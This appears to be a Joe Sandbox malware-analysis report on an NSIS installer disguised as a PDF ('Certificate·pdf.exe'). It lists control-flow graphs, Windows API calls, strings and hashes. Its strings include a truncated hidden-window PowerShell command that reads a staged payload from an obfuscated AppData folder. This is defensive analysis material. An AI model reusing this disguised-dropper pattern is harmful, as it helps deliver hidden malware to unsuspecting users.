          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
          • String ID:
          • API String ID: 3282139019-0
          • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
          • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
          • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
          • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 293 403987-40399f call 406671 296 4039a1-4039b1 call 4061de 293->296 297 4039b3-4039ea call 406165 293->297 306 403a0d-403a36 call 403c5d call 405c74 296->306 301 403a02-403a08 lstrcatW 297->301 302 4039ec-4039fd call 406165 297->302 301->306 302->301 311 403ac8-403ad0 call 405c74 306->311 312 403a3c-403a41 306->312 317 403ad2-403ad9 call 4062b9 311->317 318 403ade-403b03 LoadImageW 311->318 312->311 313 403a47-403a61 call 406165 312->313 319 403a66-403a6f 313->319 317->318 322 403b84-403b8c call 40140b 318->322 323 403b05-403b35 RegisterClassW 318->323 319->311 320 403a71-403a75 319->320 324 403a87-403a93 lstrlenW 320->324 325 403a77-403a84 call 405b99 320->325 336 403b96-403ba1 call 403c5d 322->336 337 403b8e-403b91 322->337 326 403c53 323->326 327 403b3b-403b7f SystemParametersInfoW CreateWindowExW 323->327 331 403a95-403aa3 lstrcmpiW 324->331 332 403abb-403ac3 call 405b6c call 406297 324->332 325->324 330 403c55-403c5c 326->330 327->322 331->332 335 403aa5-403aaf GetFileAttributesW 331->335 332->311 339 403ab1-403ab3 335->339 340 403ab5-403ab6 call 405bb8 335->340 346 403ba7-403bc1 ShowWindow call 406601 336->346 347 403c2a-403c2b call 4053d2 336->347 337->330 339->332 339->340 340->332 352 403bc3-403bc8 call 406601 346->352 353 403bcd-403bdf GetClassInfoW 346->353 350 403c30-403c32 347->350 354 403c34-403c3a 350->354 355 403c4c-403c4e call 40140b 350->355 352->353 358 403be1-403bf1 GetClassInfoW RegisterClassW 353->358 359 403bf7-403c1a DialogBoxParamW call 40140b 353->359 354->337 360 403c40-403c47 call 40140b 354->360 355->326 358->359 363 403c1f-403c28 call 4038d7 359->363 360->337 363->330
          APIs
            • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
            • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
          • lstrcatW.KERNEL32(1033,007A1F20), ref: 00403A08
          • lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Skamflelsens\fameless,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
          • lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Skamflelsens\fameless,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
          • GetFileAttributesW.KERNEL32(Execute: ), ref: 00403AA6
          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Skamflelsens\fameless), ref: 00403AEF
            • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
          • RegisterClassW.USER32(007A79C0), ref: 00403B2C
          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
          • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
          • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
          • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
          • RegisterClassW.USER32(007A79C0), ref: 00403BF1
          • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Skamflelsens\fameless$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
          • API String ID: 1975747703-3002412207
          • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
          • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
          • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
          • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 367 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 370 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 367->370 371 402f2d-402f32 367->371 379 403052-403060 call 402e79 370->379 380 402f6b 370->380 372 40310f-403113 371->372 387 403062-403065 379->387 388 4030b5-4030ba 379->388 382 402f70-402f87 380->382 383 402f89 382->383 384 402f8b-402f94 call 40330e 382->384 383->384 393 402f9a-402fa1 384->393 394 4030bc-4030c4 call 402e79 384->394 390 403067-40307f call 403324 call 40330e 387->390 391 403089-4030b3 GlobalAlloc call 403324 call 403116 387->391 388->372 390->388 413 403081-403087 390->413 391->388 418 4030c6-4030d7 391->418 397 402fa3-402fb7 call 405d48 393->397 398 40301d-403021 393->398 394->388 403 40302b-403031 397->403 416 402fb9-402fc0 397->416 402 403023-40302a call 402e79 398->402 398->403 402->403 409 403040-40304a 403->409 410 403033-40303d call 406764 403->410 409->382 417 403050 409->417 410->409 413->388 413->391 416->403 420 402fc2-402fc9 416->420 417->379 421 4030d9 418->421 422 4030df-4030e4 418->422 420->403 424 402fcb-402fd2 420->424 421->422 423 4030e5-4030eb 422->423 423->423 425 4030ed-403108 SetFilePointer call 405d48 423->425 424->403 426 402fd4-402fdb 424->426 429 40310d 425->429 426->403 428 402fdd-402ffd 426->428 428->388 430 403003-403007 428->430 429->372 431 403009-40300d 430->431 432 40300f-403017 430->432 431->417 431->432 432->403 433 403019-40301b 432->433 433->403
          APIs
          • GetTickCount.KERNEL32 ref: 00402EEE
          • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
            • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
            • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
          Strings
          • Inst, xrefs: 00402FC2
          • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
          • Null, xrefs: 00402FD4
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
          • vy, xrefs: 00402F6B
          • "C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 00402EDD
          • soft, xrefs: 00402FCB
          • Error launching installer, xrefs: 00402F2D
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: File$AttributesCountCreateModuleNameSizeTick
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
          • API String ID: 4283519449-1224506812
          • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
          • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
          • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
          • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 434 4062b9-4062c4 435 4062c6-4062d5 434->435 436 4062d7-4062ed 434->436 435->436 437 4062f3-406300 436->437 438 406505-40650b 436->438 437->438 441 406306-40630d 437->441 439 406511-40651c 438->439 440 406312-40631f 438->440 442 406527-406528 439->442 443 40651e-406522 call 406297 439->443 440->439 444 406325-406331 440->444 441->438 443->442 446 4064f2 444->446 447 406337-406375 444->447 450 406500-406503 446->450 451 4064f4-4064fe 446->451 448 406495-406499 447->448 449 40637b-406386 447->449 454 40649b-4064a1 448->454 455 4064cc-4064d0 448->455 452 406388-40638d 449->452 453 40639f 449->453 450->438 451->438 452->453 456 40638f-406392 452->456 459 4063a6-4063ad 453->459 457 4064b1-4064bd call 406297 454->457 458 4064a3-4064af call 4061de 454->458 460 4064d2-4064da call 4062b9 455->460 461 4064df-4064f0 lstrlenW 455->461 456->453 462 406394-406397 456->462 472 4064c2-4064c8 457->472 458->472 464 4063b2-4063b4 459->464 465 4063af-4063b1 459->465 460->461 461->438 462->453 468 406399-40639d 462->468 470 4063b6-4063d4 call 406165 464->470 471 4063ef-4063f2 464->471 465->464 468->459 480 4063d9-4063dd 470->480 473 406402-406405 471->473 474 4063f4-406400 GetSystemDirectoryW 471->474 472->461 476 4064ca 472->476 478 406470-406472 473->478 479 406407-406415 GetWindowsDirectoryW 473->479 477 406474-406478 474->477 481 40648d-406493 call 40652b 476->481 477->481 486 40647a 477->486 478->477 483 406417-406421 478->483 479->478 484 4063e3-4063ea call 4062b9 480->484 485 40647d-406480 480->485 481->461 488 406423-406426 483->488 489 40643b-406451 SHGetSpecialFolderLocation 483->489 484->477 485->481 491 406482-406488 lstrcatW 485->491 486->485 488->489 492 406428-40642f 488->492 493 406453-40646a SHGetPathFromIDListW CoTaskMemFree 489->493 494 40646c 489->494 491->481 496 406437-406439 492->496 493->477 493->494 494->478 496->477 496->489
          APIs
          • GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 004063FA
          • GetWindowsDirectoryW.KERNEL32(Execute: ,00000400,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 0040640D
          • SHGetSpecialFolderLocation.SHELL32(00405336,00790DA9,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 00406449
          • SHGetPathFromIDListW.SHELL32(00790DA9,Execute: ), ref: 00406457
          • CoTaskMemFree.OLE32(00790DA9), ref: 00406462
          • lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
          • lstrlenW.KERNEL32(Execute: ,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 004064E0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
          • String ID: Execute: $Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
          • API String ID: 717251189-1081890849
          • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
          • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
          • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
          • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 497 40176f-401794 call 402c41 call 405be3 502 401796-40179c call 406297 497->502 503 40179e-4017b0 call 406297 call 405b6c lstrcatW 497->503 509 4017b5-4017b6 call 40652b 502->509 503->509 512 4017bb-4017bf 509->512 513 4017c1-4017cb call 4065da 512->513 514 4017f2-4017f5 512->514 521 4017dd-4017ef 513->521 522 4017cd-4017db CompareFileTime 513->522 516 4017f7-4017f8 call 405d68 514->516 517 4017fd-401819 call 405d8d 514->517 516->517 524 40181b-40181e 517->524 525 40188d-4018b6 call 4052ff call 403116 517->525 521->514 522->521 526 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 524->526 527 40186f-401879 call 4052ff 524->527 539 4018b8-4018bc 525->539 540 4018be-4018ca SetFileTime 525->540 526->512 560 401864-401865 526->560 537 401882-401888 527->537 541 402ace 537->541 539->540 543 4018d0-4018db FindCloseChangeNotification 539->543 540->543 547 402ad0-402ad4 541->547 545 4018e1-4018e4 543->545 546 402ac5-402ac8 543->546 549 4018e6-4018f7 call 4062b9 lstrcatW 545->549 550 4018f9-4018fc call 4062b9 545->550 546->541 554 401901-4022fc call 4058fd 549->554 550->554 554->546 554->547 560->537 562 401867-401868 560->562 562->527
          APIs
          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
          • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,00000000,00000000,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens,?,?,00000031), ref: 004017D5
            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
            • Part of subcall function 004052FF: lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
            • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
            • Part of subcall function 004052FF: lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
            • Part of subcall function 004052FF: SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
            • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove$C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens$powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\
          • API String ID: 1941528284-3484373495
          • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
          • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
          • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
          • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 563 4052ff-405314 564 40531a-40532b 563->564 565 4053cb-4053cf 563->565 566 405336-405342 lstrlenW 564->566 567 40532d-405331 call 4062b9 564->567 569 405344-405354 lstrlenW 566->569 570 40535f-405363 566->570 567->566 569->565 571 405356-40535a lstrcatW 569->571 572 405372-405376 570->572 573 405365-40536c SetWindowTextW 570->573 571->570 574 405378-4053ba SendMessageW * 3 572->574 575 4053bc-4053be 572->575 573->572 574->575 575->565 576 4053c0-4053c3 575->576 576->565
          APIs
          • lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
          • lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
          • lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
          • SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$lstrlen$TextWindowlstrcat
          • String ID: Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il
          • API String ID: 2531174081-2389797844
          • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
          • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
          • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
          • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 577 406601-406621 GetSystemDirectoryW 578 406623 577->578 579 406625-406627 577->579 578->579 580 406638-40663a 579->580 581 406629-406632 579->581 583 40663b-40666e wsprintfW LoadLibraryExW 580->583 581->580 582 406634-406636 581->582 582->583
          APIs
          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
          • wsprintfW.USER32 ref: 00406653
          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406667
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
